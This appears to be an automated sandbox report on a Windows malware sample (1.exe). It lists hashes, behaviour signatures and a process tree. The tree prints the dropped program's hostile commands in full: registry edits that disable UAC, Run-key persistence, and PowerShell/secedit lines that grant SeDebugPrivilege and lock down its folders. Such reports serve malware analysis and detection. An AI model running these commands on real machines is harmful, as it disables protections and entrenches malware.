Overview
overview
10Static
static
10010df829b9...28.exe
windows7-x64
10010df829b9...28.exe
windows10-2004-x64
101.exe
windows7-x64
101.exe
windows10-2004-x64
101d730b2a86...84.exe
windows7-x64
71d730b2a86...84.exe
windows10-2004-x64
71f4559c246...c1.exe
windows7-x64
101f4559c246...c1.exe
windows10-2004-x64
10265c128a8a...2f.exe
windows7-x64
10265c128a8a...2f.exe
windows10-2004-x64
1049432b3c21...b4.exe
windows7-x64
1049432b3c21...b4.exe
windows10-2004-x64
1054fa454476...b1.exe
windows7-x64
1054fa454476...b1.exe
windows10-2004-x64
1066e68902e9...68.exe
windows7-x64
1066e68902e9...68.exe
windows10-2004-x64
10820a177b58...5f.exe
windows7-x64
10820a177b58...5f.exe
windows10-2004-x64
108d5514730f...d4.exe
windows7-x64
108d5514730f...d4.exe
windows10-2004-x64
1093e14db4af...0c.exe
windows7-x64
1093e14db4af...0c.exe
windows10-2004-x64
109770fde1f1...18.exe
windows7-x64
69770fde1f1...18.exe
windows10-2004-x64
6App_Dev_Details.xlsm
windows7-x64
6App_Dev_Details.xlsm
windows10-2004-x64
6Celery.exe
windows7-x64
7Celery.exe
windows10-2004-x64
7a563257161...10.xls
windows7-x64
3a563257161...10.xls
windows10-2004-x64
1crss.exe
windows7-x64
7crss.exe
windows10-2004-x64
9Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 18:12
Behavioral task
behavioral1
Sample
010df829b95529730aa0840699e780b9176822dbefc24864ccc134a790043a28.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
010df829b95529730aa0840699e780b9176822dbefc24864ccc134a790043a28.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
1.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
1d730b2a86c3c18be5d1fe22ee0fdd869d6ca4e01da70f53dd5722619a61b184.exe
Resource
win7-20241010-en
Behavioral task
behavioral6
Sample
1d730b2a86c3c18be5d1fe22ee0fdd869d6ca4e01da70f53dd5722619a61b184.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
1f4559c2464e25078e6f0ae6b99990b6607c5adc0d631d43ba380ae7de51f0c1.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
1f4559c2464e25078e6f0ae6b99990b6607c5adc0d631d43ba380ae7de51f0c1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
265c128a8a9421847dea2121ae5ce79efb601616c4fd060ff9863f4c2c498c2f.exe
Resource
win7-20241023-en
Behavioral task
behavioral10
Sample
265c128a8a9421847dea2121ae5ce79efb601616c4fd060ff9863f4c2c498c2f.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
49432b3c2186b051d35f09423075574cc82dbac403e5a69f311d4451a5a0e3b4.exe
Resource
win7-20240729-en
Behavioral task
behavioral12
Sample
49432b3c2186b051d35f09423075574cc82dbac403e5a69f311d4451a5a0e3b4.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
54fa4544762fb14d407756fad69201bfaccc8db821a94e63079531d556cddeb1.exe
Resource
win7-20241010-en
Behavioral task
behavioral14
Sample
54fa4544762fb14d407756fad69201bfaccc8db821a94e63079531d556cddeb1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
66e68902e968ac5c762b7d4950df70b2ef8125d38d6884ff9e37e72542e47b68.exe
Resource
win7-20240708-en
Behavioral task
behavioral16
Sample
66e68902e968ac5c762b7d4950df70b2ef8125d38d6884ff9e37e72542e47b68.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
820a177b585f0a50c430e1b2ac66467cda0d96eb80b8e39ddf23079c8f2c685f.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
820a177b585f0a50c430e1b2ac66467cda0d96eb80b8e39ddf23079c8f2c685f.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
8d5514730f330a6f4ae9b1807f0c77ed15975d469c7c92c10c690ed681210ed4.exe
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
8d5514730f330a6f4ae9b1807f0c77ed15975d469c7c92c10c690ed681210ed4.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
93e14db4af6b127444c9349f6c9162f4eebba4c220378be18d63f9951cb63b0c.exe
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
93e14db4af6b127444c9349f6c9162f4eebba4c220378be18d63f9951cb63b0c.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
9770fde1f1e7fd98bedf06daa29c7451f52ad1719a0d606343846c73b34e8218.exe
Resource
win7-20241023-en
Behavioral task
behavioral24
Sample
9770fde1f1e7fd98bedf06daa29c7451f52ad1719a0d606343846c73b34e8218.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
App_Dev_Details.xlsm
Resource
win7-20241010-en
Behavioral task
behavioral26
Sample
App_Dev_Details.xlsm
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
Celery.exe
Resource
win7-20240903-en
Behavioral task
behavioral28
Sample
Celery.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
a563257161e5c3947e4ea5669e1ef5eafbe67d5049816de47313ada6f299ac10.xls
Resource
win7-20240903-en
Behavioral task
behavioral30
Sample
a563257161e5c3947e4ea5669e1ef5eafbe67d5049816de47313ada6f299ac10.xls
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
crss.exe
Resource
win7-20241010-en
Behavioral task
behavioral32
Sample
crss.exe
Resource
win10v2004-20241007-en
General
-
Target
1.exe
-
Size
7.8MB
-
MD5
37f147e176952471079d4c8065fb6e00
-
SHA1
9e93d4c945c28fe61e2182e0d10e0934463a0ea6
-
SHA256
c981db0ed18cd58ec4c2f7a6f80d3e49999fbdde290ace3e4b54513d8174a8e3
-
SHA512
577af208371ba1501278c9cdec7fca689fdba5be60695a9009ab5bbae790a5936d65b1ed3af46a85c9343f876a66400f0786c49d58dc0d3c094245237d395763
-
SSDEEP
98304:MPZYxnMe4V/cJtKpGvJc5twG9Nh0AA/Sxrn4l8aC98YRO40kMMT1hxUdjX:lxMe4cxhAj48QYgqdUV
Malware Config
Signatures
-
Processes:
iusb3mon.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" iusb3mon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" iusb3mon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" iusb3mon.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
iusb3mon.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ iusb3mon.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3788 powershell.exe 3268 powershell.exe 2088 powershell.exe 4008 powershell.exe 5032 powershell.exe 2948 powershell.exe 2308 powershell.exe 1868 powershell.exe 4688 powershell.exe 4308 powershell.exe 2804 powershell.exe 932 powershell.exe 4912 powershell.exe 744 powershell.exe 3376 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
iusb3mon.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion iusb3mon.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion iusb3mon.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
irsetup.exe1.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation irsetup.exe Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation 1.exe -
Executes dropped EXE 3 IoCs
Processes:
irsetup.exeun.exeiusb3mon.exepid process 2168 irsetup.exe 4288 un.exe 3768 iusb3mon.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
iusb3mon.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine iusb3mon.exe -
Loads dropped DLL 1 IoCs
Processes:
irsetup.exepid process 2168 irsetup.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
iusb3mon.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe" iusb3mon.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe" iusb3mon.exe Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\ProgramData\\Program\\iusb3mon.exe" iusb3mon.exe -
Processes:
iusb3mon.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" iusb3mon.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
iusb3mon.exepid process 3768 iusb3mon.exe -
Hide Artifacts: Ignore Process Interrupts 1 TTPs 7 IoCs
Command interpreters often include specific commands/flags that ignore errors and other hangups.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4688 powershell.exe 4308 powershell.exe 2804 powershell.exe 3376 powershell.exe 2948 powershell.exe 5032 powershell.exe 744 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 20 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exeSecEdit.execmd.exeschtasks.exepowershell.exepowershell.exepowershell.exepowershell.exeSecEdit.exeSecEdit.exepowershell.exepowershell.exepowershell.execmd.execmd.exeSecEdit.exepowershell.exepowershell.exeiusb3mon.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SecEdit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SecEdit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SecEdit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SecEdit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iusb3mon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
iusb3mon.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz iusb3mon.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 iusb3mon.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
irsetup.exepowershell.exeiusb3mon.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2168 irsetup.exe 2168 irsetup.exe 2168 irsetup.exe 2168 irsetup.exe 2168 irsetup.exe 2168 irsetup.exe 2168 irsetup.exe 2168 irsetup.exe 2168 irsetup.exe 2168 irsetup.exe 2168 irsetup.exe 2168 irsetup.exe 2168 irsetup.exe 2168 irsetup.exe 5032 powershell.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 5032 powershell.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 744 powershell.exe 744 powershell.exe 1868 powershell.exe 1868 powershell.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 744 powershell.exe 932 powershell.exe 932 powershell.exe 4912 powershell.exe 4912 powershell.exe 2308 powershell.exe 2308 powershell.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 3768 iusb3mon.exe 2308 powershell.exe 1868 powershell.exe 932 powershell.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 5032 powershell.exe Token: SeDebugPrivilege 744 powershell.exe Token: SeDebugPrivilege 4912 powershell.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeDebugPrivilege 932 powershell.exe Token: SeDebugPrivilege 1868 powershell.exe Token: SeDebugPrivilege 4688 powershell.exe Token: SeDebugPrivilege 3788 powershell.exe Token: SeDebugPrivilege 4008 powershell.exe Token: SeDebugPrivilege 4308 powershell.exe Token: SeDebugPrivilege 2804 powershell.exe Token: SeDebugPrivilege 3376 powershell.exe Token: SeDebugPrivilege 3268 powershell.exe Token: SeDebugPrivilege 2088 powershell.exe Token: SeDebugPrivilege 2948 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
irsetup.exeun.exeiusb3mon.exepid process 2168 irsetup.exe 2168 irsetup.exe 2168 irsetup.exe 4288 un.exe 3768 iusb3mon.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1.exeirsetup.exeiusb3mon.exepowershell.exepowershell.exepowershell.exepowershell.execmd.exedescription pid process target process PID 1208 wrote to memory of 2168 1208 1.exe irsetup.exe PID 1208 wrote to memory of 2168 1208 1.exe irsetup.exe PID 2168 wrote to memory of 4288 2168 irsetup.exe un.exe PID 2168 wrote to memory of 4288 2168 irsetup.exe un.exe PID 2168 wrote to memory of 3768 2168 irsetup.exe iusb3mon.exe PID 2168 wrote to memory of 3768 2168 irsetup.exe iusb3mon.exe PID 2168 wrote to memory of 3768 2168 irsetup.exe iusb3mon.exe PID 2168 wrote to memory of 5032 2168 irsetup.exe powershell.exe PID 2168 wrote to memory of 5032 2168 irsetup.exe powershell.exe PID 3768 wrote to memory of 4912 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 4912 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 4912 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 932 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 932 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 932 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 1868 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 1868 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 1868 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 2308 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 2308 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 2308 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 5100 3768 iusb3mon.exe cmd.exe PID 3768 wrote to memory of 5100 3768 iusb3mon.exe cmd.exe PID 3768 wrote to memory of 5100 3768 iusb3mon.exe cmd.exe PID 2168 wrote to memory of 744 2168 irsetup.exe powershell.exe PID 2168 wrote to memory of 744 2168 irsetup.exe powershell.exe PID 3768 wrote to memory of 2784 3768 iusb3mon.exe cmd.exe PID 3768 wrote to memory of 2784 3768 iusb3mon.exe cmd.exe PID 3768 wrote to memory of 2784 3768 iusb3mon.exe cmd.exe PID 3768 wrote to memory of 3024 3768 iusb3mon.exe cmd.exe PID 3768 wrote to memory of 3024 3768 iusb3mon.exe cmd.exe PID 3768 wrote to memory of 3024 3768 iusb3mon.exe cmd.exe PID 2168 wrote to memory of 4688 2168 irsetup.exe powershell.exe PID 2168 wrote to memory of 4688 2168 irsetup.exe powershell.exe PID 2308 wrote to memory of 4112 2308 powershell.exe schtasks.exe PID 2308 wrote to memory of 4112 2308 powershell.exe schtasks.exe PID 2308 wrote to memory of 4112 2308 powershell.exe schtasks.exe PID 3768 wrote to memory of 3788 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 3788 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 3788 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 4008 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 4008 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 4008 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 4308 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 4308 3768 iusb3mon.exe powershell.exe PID 3768 wrote to memory of 4308 3768 iusb3mon.exe powershell.exe PID 1868 wrote to memory of 4652 1868 powershell.exe SecEdit.exe PID 1868 wrote to memory of 4652 1868 powershell.exe SecEdit.exe PID 1868 wrote to memory of 4652 1868 powershell.exe SecEdit.exe PID 4912 wrote to memory of 4088 4912 powershell.exe Conhost.exe PID 4912 wrote to memory of 4088 4912 powershell.exe Conhost.exe PID 4912 wrote to memory of 4088 4912 powershell.exe Conhost.exe PID 3768 wrote to memory of 1100 3768 iusb3mon.exe cmd.exe PID 3768 wrote to memory of 1100 3768 iusb3mon.exe cmd.exe PID 3768 wrote to memory of 1100 3768 iusb3mon.exe cmd.exe PID 932 wrote to memory of 2688 932 powershell.exe SecEdit.exe PID 932 wrote to memory of 2688 932 powershell.exe SecEdit.exe PID 932 wrote to memory of 2688 932 powershell.exe SecEdit.exe PID 1100 wrote to memory of 4112 1100 cmd.exe schtasks.exe PID 1100 wrote to memory of 4112 1100 cmd.exe schtasks.exe PID 1100 wrote to memory of 4112 1100 cmd.exe schtasks.exe PID 2168 wrote to memory of 2804 2168 irsetup.exe powershell.exe PID 2168 wrote to memory of 2804 2168 irsetup.exe powershell.exe PID 2168 wrote to memory of 3376 2168 irsetup.exe powershell.exe -
System policy modification 1 TTPs 3 IoCs
Processes:
iusb3mon.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" iusb3mon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" iusb3mon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" iusb3mon.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe"C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5660018 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\1.exe" "__IRCT:2" "__IRTSS:0" "__IRSID:S-1-5-21-2878641211-696417878-3864914810-1000"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\ProgramData\Data\un.exe"C:\ProgramData\Data\un.exe" x -o+ -ppoiuytrewq C:\ProgramData\Data\upx.rar iusb3mon.exe C:\ProgramData\Program\3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4288
-
-
C:\ProgramData\Program\iusb3mon.exe"C:\ProgramData\Program\iusb3mon.exe" false3⤵
- UAC bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3768 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\SysWOW64\SecEdit.exe"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log /quiet5⤵
- System Location Discovery: System Language Discovery
PID:4088
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Microsoft\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.*')) -Force;"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Windows\SysWOW64\SecEdit.exe"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log /quiet5⤵
- System Location Discovery: System Language Discovery
PID:2688
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\SysWOW64\SecEdit.exe"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log /quiet5⤵
- System Location Discovery: System Language Discovery
PID:4652
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\SysWOW64\SecEdit.exe"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log /quiet5⤵
- System Location Discovery: System Language Discovery
PID:4112
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo.>c:\inst.ini4⤵
- System Location Discovery: System Language Discovery
PID:5100
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo.>c:\inst.ini4⤵
- System Location Discovery: System Language Discovery
PID:2784
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo.>c:\inst.ini4⤵
- System Location Discovery: System Language Discovery
PID:3024
-
-
